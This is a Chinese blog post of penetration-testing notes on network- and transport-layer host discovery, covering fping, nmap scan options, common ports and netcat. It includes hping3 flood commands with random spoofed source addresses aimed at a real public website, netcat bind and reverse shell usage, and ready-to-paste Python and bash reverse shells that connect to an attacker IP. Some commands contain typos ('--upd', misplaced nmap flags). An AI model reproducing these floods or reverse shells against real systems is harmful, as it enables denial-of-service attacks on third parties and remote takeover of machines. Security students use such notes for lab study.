三层发现(网络层)

最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户

fping

-a 存活主机
-b 数据包大小
-f 从文件中读取ip(不能和-g同时使用)
-l 循环ping
-g 网段,开始-结束地址
-u 不可达,ping不通

图一没有设置范围,图二设置了扫描的开始地址和结束地址,如果没有设置范围,就默认从头扫到尾。

2>/dev/null 是为了防止奇怪的输出

hping3

可以发动ddos攻击,主要用于ddos,但不好测试,一旦使用对自己和他人的网络都有威胁。

数据包要大,发的要快

-a:                  伪造源ip(隐藏自己)
-c:                  发包的数目
-p:                  端口
-d:                  发包大小
-i:                   发包间隔
-w:                 滑动窗口大小
--flood               尽快发送数据包,不回复
--rand-source    随机源地址(-a是指定一个伪造ip,这是随机)

--udp       udp攻击
--icmp      icmp攻击
-S            syn攻击
-A            ack攻击

hping3 --upd -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 --icmp -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 -S -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com

四层发现(传输层)

依靠TCP/UDP传输——可靠、TCP的三次握手——花费时间长

如果防火墙关闭icmp二层,三层命令直接gg,无法ping通,但是四层发现可以通过端口来检测

nmap

主机发现

-sn:只探测存活(基于icmp,开防火墙无效)
-Pn:只探测端口(开防火墙有效)

-O :操作系统探测

端口探测
-sS:tcp syn扫描 扫端口(常用,最好用,速度快,隐蔽性好,第三次握手没实现)
-p :端口,(80,8080)——探测80和8080端口

(-p-)——探测全部的端口

(80-8080)——探测80到8080的端口

nmap默认扫描范围为1——1000

nmap -p -sS 80 192.168.111.131

nmap -p- -sS192.168.111.131

nmap -p 80-8080 -sS192.168.111.131
-sV:探测服务版本(很重要,可利用版本漏洞)
-A :综合扫描
-iL:指定文件扫描

--exclude:            排除ip
--excludefile:        指定文件列表
--script=vuln:       常见漏洞扫描

nmap的保存和输出

nmap -F -oN test.txt IP/24

 常见端口号

端口 端口说明
21 ftp
22 ssh
23 telnet
80 http
443 https
139 samba
3306 mysql
3389 RDP远程桌面

NC(netcat)

shell——命令解释器 

反弹shell

让恶意程序主动连接我们

使用场景:蚁剑 → 服务器(反弹)kali监听 → 提权

-c | -e 执行指令
-v 详细信息, -vv 更详细
-l listen 监听
-n ip的形式指定连接地址,非域名
-p 指定端口
-q 结束延迟
-w 超时时间
-z 零输入输出,只扫端口 可以指定范围,例如80-8080

kali 输入ip:正向
win7 输入ip:反向

kali: nc -lvvp 4444 -e 
win7: nc kaliIp 4444 - e cmd

反向连接:

正向连接:

 传输文件:

Server:nc < fileName
Client:nc > fileName

端口探测:

 乱码解决:

拿反向连接举例,会发现连接成功之后会有乱码出现

出现乱码的原因其实是两个系统的编码不同

kali:     utf-8 一个字占3字节
win7: gbk  一个字占2字节

因此win7到kali,出现了乱码,解决方案——chcp命令

chcp 65001 utf-8
chcp 936 gbk

 一些反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash -c 'exec bash -i &>/dev/tcp/10.0.0.3/4444 <&1'

内网渗透笔记——三层发现and四层发现相关推荐

  1. 三层内网渗透笔记-靶场(teamssix.com)

    环境搭建 参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射 端口 target 1和target2 开始: tar ...

  2. 内网渗透笔记——二层发现

    一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...

  3. 内网渗透、三层拓扑、红队考核靶场(ack123)

    前言 1.此靶场出自暗月团队 2.因为自己搭环境有点复杂,而且这么多台机器卡死了,我先把所有的杀软手动卸载了,不然因为环境问题处差错不好排查,免杀部分单独学习了! 环境搭建 https://www.b ...

  4. 红日安全内网渗透笔记

    靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...

  5. 内网渗透笔记——:)一个笑脸

    打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...

  6. 内网渗透笔记——msf

    Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000    ...

  7. 内网渗透笔记——注册表自启动与msi提权

    目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini.system.ini.wininit.ini ...

  8. 三层网络靶场搭建MSF内网渗透

    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...

  9. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

最新文章

  1. 网站内链优化中有哪些常见的形式?
  2. 李开复悔过:把运营微博当人生,把获取粉丝当游戏
  3. 从快的打车:说O2O产品的奇特推广模式
  4. 一次面试引发的思考(中小型网站优化思考)
  5. 【数据结构与算法】之深入解析“最小覆盖子串”的求解思路与算法示例
  6. javaweb学习总结(六):Servlet开发(二)
  7. 在matlab中ungetfile后,11条Matlab实用小技巧
  8. Ubuntu 18.04 安装中文输入法
  9. [2010-8-24]
  10. mysql clomn_mysql 命令总结
  11. 【论文分享】ACL 2020 细粒度情感分析方法
  12. 学点PYTHON基础的东东--数据结构,算法,设计模式---访问者模式
  13. hbase 安装_如何搭建一个HBase集群
  14. 康熙字典214个部首CJK编码
  15. 网站流量日志分析系统笔记(Hadoop大数据技术原理与应用)
  16. Proteus器件查找
  17. 电脑数据恢复软件推荐10款
  18. python实现高斯消元法求线性方程组的解
  19. java math pow_Java Math.pow() 方法
  20. 端端Clouduolc的安全机制

热门文章

  1. 编译原理——证明文法的二义性(1)
  2. phpstorm 免费生成 激活码 保证有效
  3. 解决:Activiti7与SpringBoot整合时,默认生成的activiti数据库中只有17张表,无另外8张历史表
  4. Android requires compiler compliance level 5.0 or 6.0. Found '1.7' instead.
  5. Dango 之 Xadmin
  6. Vue - 每个页面单独设置 body 背景色(独立修改单个页面的背景色,不同页面设置不同的背景颜色)
  7. [云上贵州2017]智慧交通预测挑战赛
  8. WIN7下VirtualBox “指令引用的0x0000000内存”报错问题
  9. 如何从零开始系统学习量化交易-附资料
  10. vip邮箱账号格式和普通邮箱区别是什么呢?